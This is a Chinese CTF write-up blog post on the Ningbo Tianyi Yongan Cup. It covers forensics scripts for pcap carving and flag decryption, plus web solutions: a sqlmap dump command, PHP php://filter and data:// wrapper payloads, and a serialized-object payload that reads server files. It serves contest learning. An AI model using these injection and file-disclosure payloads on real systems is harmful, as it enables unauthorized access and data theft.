宁波天一永安杯
本文最后更新于 202 天前,其中的信息可能已经有所发展或是发生改变。

Misc

zip

  • 根据压缩包注释,猜测字符集为01的密码,长度1-9,爆破得到flag

SimpleDocument

  • foremost分离文件,得到一个pdf,直接Ctrl+ACtrl+C

BeautifulImage

  • LSB隐写,base64隐写

hacker_traffic

  • 直接对分离文件,得到带有注释的压缩包
    • password is (md5(virus_file) + lhost_ip)
  • 存在大量ELF木马文件
  • 写个脚本全部提取
a = open("hacker_traffic.pcapng", 'rb').read()
a = a.hex()
b = [16055, 55019, 92151, 129283, 166415, 203547, 240679, 277811, 314943, 352075, 389207, 426339, 463471, 500603, 537735, 574867, 611999, 649131, 686263, 723395, 760527, 797659, 839291, 876423, 913555, 950687, 987819, 1024951, 1062083, 1099215, 1136347, 1173479, 1210611, 1247743, 1284875, 1322007, 1359139, 1396271, 1433403, 1470535, 1507667, 1544799, 1581931, 1619063, 1656195, 1693327, 1730459, 1767591, 1804723, 1841855, 1878987, 1916119, 1953251, 1990383, 2027515, 2064647, 2101779, 2138911, 2176043, 2213175, 2250307, 2287567, 2324699, 2361959, 2399091, 2436223, 2473355, 2510487, 2547619, 2584751, 2621883, 2659015, 2696147, 2733279, 2770411, 2807543, 2844675, 2881807, 2918939, 2956071, 2993203, 3030335, 3067467, 3104599, 3141731, 3178863, 3215995, 3253127, 3290259, 3327391, 3364523, 3401655, 3438787, 3475919, 3513051, 3550183, 3587315, 3624447, 3661579, 3698711]

for i in b:
    open(f"test/{i}", "wb").write(bytes.fromhex(a[i * 2:i * 2 +33792]))
  • 发现一个ip地址,运行一下抓个包,判断此地址就是lhost
  • 接下来算MD5,发现值不对,可能是结尾有多的东西,写个脚本生成个字典
from hashlib import md5


a = open('2287567', 'rb').read()
# for i in range(len(a))
file = open('test.txt', 'a')
for i in range(len(a)):
    file.write(md5(a[:-i]).hexdigest() + '192.168.3.201\n')
  • 解压得到加密脚本
from flag import secret
key = "x.x.x.x"


def encrypt_flag(flag, key):
    random.seed(key)
    table = list(range(0, 38))
    random.shuffle(table)
    flag = [flag[i] for i in table]
    ascii_flag = [ord(c) for c in flag]
    random.seed(key)
    xor_key = random.randint(0, 255)
    encrypted_flag = [c ^ xor_key for c in ascii_flag]
    return base64.b64encode(bytes(encrypted_flag)).decode("ascii")
print(encrypt_flag(flag, key))
# VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=
  • 写个解密脚本
import base64

def decrypt(t):
    flag = base64.b64decode(t).decode("ascii")
    xor_key = 96
    ascii_flag = [ord(c) for c in flag]
    encrypted_flag = ''.join([chr(c ^ xor_key) for c in ascii_flag])
    table = [25, 28, 7, 24, 5, 0, 33, 21, 1, 31, 29, 2, 18, 27, 19, 13, 22, 9, 30, 10, 3, 11, 35, 15, 20, 16, 4, 23, 37, 36, 17, 32, 6, 34, 8, 26, 14, 12]
    a = [i for i in range(38)]
    for i in range(38):
        a[table[i]] = encrypted_flag[i]
    print(''.join(a))


decrypt("VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=".encode())

Web

Query

  • sqlmap一把梭
python sqlmap.py -u http://62be1f5b518e59a9.node.nsctf.cn/login.php --data="username=admin&password=admin" -D ctf -T f111 --dump --batch

codecheck

<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
  • payload
?a=data://text/plain;base64,ZmxhZw==&b=php://filter/read=convert.base64-encode/resource=index.php&c=a&d=a

Deserialization

  • 读取route.php
  • read=php://filter/read=convert.base64-encode/resource=route.php&input=1
  • read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
  • read=h1nt.php&input=O:4:”test”:1:{s:8:”position”;s:57:”php://filter/read=convert.base64-encode/resource=f14g.php”;}
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇